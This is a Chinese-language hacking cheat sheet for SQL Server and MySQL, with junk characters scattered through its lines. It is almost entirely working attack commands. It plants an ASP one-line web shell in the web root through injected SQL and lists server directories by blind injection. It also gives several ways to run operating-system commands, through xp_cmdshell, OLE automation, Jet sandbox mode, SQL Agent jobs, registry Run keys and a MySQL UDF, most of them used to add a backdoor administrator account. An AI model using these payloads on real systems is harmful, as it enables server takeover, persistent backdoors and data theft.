MSSQL语句导出一句话木马6 i) q- j* Q- L* x
首先确定网站的WEB路径/ g; C+ G" I: Y: o6 d$ v& ~
;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马4 {9 e, N* @8 v6 G& T
: `, b! G* V. [& W- R1 E;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');-- ; Q- [! F- ]: o+ e$ w. q
//将一句话木马插入表中
5 c& z4 X; \( x! k. r" { ?' g
# o$ X/ f: y3 l' A0 L/ P;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';--
) k- N4 g- `4 l. h//导出一个ASP文件
1 s/ O2 w. _2 O3 g# ^7 n/ c7 T. o. N3 F+ i
) M( u0 t8 D R/ B关于MSSQL列目录- s' M# K O2 ]' i6 H1 k4 X
;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表4 Y# ?; G( q3 E
Insert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表8 k# ?. d' ~0 W% A8 v$ D! _' b m& y
6 a. M( n- n0 l F3 {( H3 n5 R
and (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录
9 w5 K) W: }2 J, F( y2 G, T4 _# G8 m2 t0 Q9 l" j5 S; {) ^2 z
And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段. ?- W6 M8 a' |0 o5 S9 @5 u
, L4 I3 F; g! v- ~
And (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符
* U$ P- z% e: Z
$ e5 d O c3 u" R
7 c* c/ i$ G' Y: j数据库版本和权限查看# L7 e) @% O; G
and 1=(select @@VERSION) //查看详细的数据库信息.$ t( r( t5 R% ^3 g. a3 x
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA, z/ P+ K2 z# a0 {
and 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER
2 T1 t+ ?+ W( `2 s1 r0 {
. q {+ g3 R5 Y, {+ B% \ I! _1 _! b* O/ P% u5 z& i+ w. l2 c, a
1.利用xp_cmdshell执行命令
9 D6 A& g% k4 Q+ l6 ` pexec master..xp_cmdshell 'net user rfire 123456 /add'
Z' W5 j- G; W9 ?0 ]) Dexec master..xp_cmdshell 'net localgroup administrators rfire /add'5 V D4 U0 Y. s' o. S! P* Z+ Z
* x& p5 Y7 ~: q7 Z0 I: u- G恢复xp_cmdshell存储过程
0 K' u" K% \: v8 E* m/ xExec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
. A3 A+ H9 @) a! E
' {0 m$ a3 Q% |- X% r3 ]! r* E7 {6 }" g& F! O. X) ?# i" S( H* y
2.利用SP_OAcreate和SP_OAMETHOD执行命令4 w n1 T# a. N" Q) i
在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下) n$ _0 C- N% i, Y* C0 ^
DECLARE @shell INT //建立一个@shell实体
* w$ p, O7 W k7 l0 h, l* lEXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例
0 r1 D% ^( Y/ H* `4 \* X/ UEXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例
& ]" N) n3 r% C& F7 g1 n; F: r
& m9 O6 w* T1 _7 S8 J4 Y/ o# ]+ Y* O0 z/ D. {
3.利用沙盒模式
) N# j" v! D+ ]: ]& f8 |% }先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。* S6 ~2 p7 D# k1 H' V
开启沙盒模式:; j0 J* a4 ^+ @/ [% z. l/ m' n; Y
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0
. | y* d" e$ l. Q7 \( k8 O% ]4 o2 d: l( W9 ~0 ?. v& ^! Y
执行命令:
/ P" P1 _$ O+ v; e* \ pSelect * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');
; F2 l7 Y& c+ G' q- o0 u9 Z3 [1 | \- h5 d
# m8 B' X1 m$ f2 o2 }, c& R. o4.利用SQL代理执行命令
$ |4 I# t, a* t) W* X6 s- tEXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务2 J6 r, |$ Y' R0 l" d# @0 [5 L
9 w9 J4 `7 O Y5 e) c' c2 Z
执行命令:
9 {* g+ k7 l+ o) k9 h7 \$ Q/ U! T% xuse msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错
9 f# j6 i8 K6 mexec sp_add_job 'x'
; j. X$ d7 E# G% `exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业
) q4 M$ Y D$ H/ G6 ]exec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业
" V1 `8 H, R) H0 q, M1 d7 e
$ H0 g; t a8 M+ r# U9 B# |8 g2 a' z! ?. o& {: `
5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)
4 x0 |0 S7 S4 N8 PEXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'! i; y/ H( h4 D2 W) m
2 f( G. ?7 K* t6 G4 a }6 g2 U9 h( L& w
6.MYSQL的命令执行
. k5 q) S/ u, a7 IMYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)
: d: ?# B3 \) \" D首先要在su.php下导出c:\windows\udf.dll! ~6 U. A8 G7 c" I6 `
导出后执行创建自定义函数命令:
C- Q: {& E/ M- a; [1 ^Create Function cmdshell returns string soname 'udf.dll'
{! \7 r7 V5 B8 ^7 p& n( Q执行命令& L7 ?+ W4 B1 k, R
select cmdshell('net user rfire 123456 /add')
4 r# y- M6 y- K2 N4 G0 y2 `执行后删除函数 drop function cmdshell
9 i# h1 j- A0 L6 Z' Z |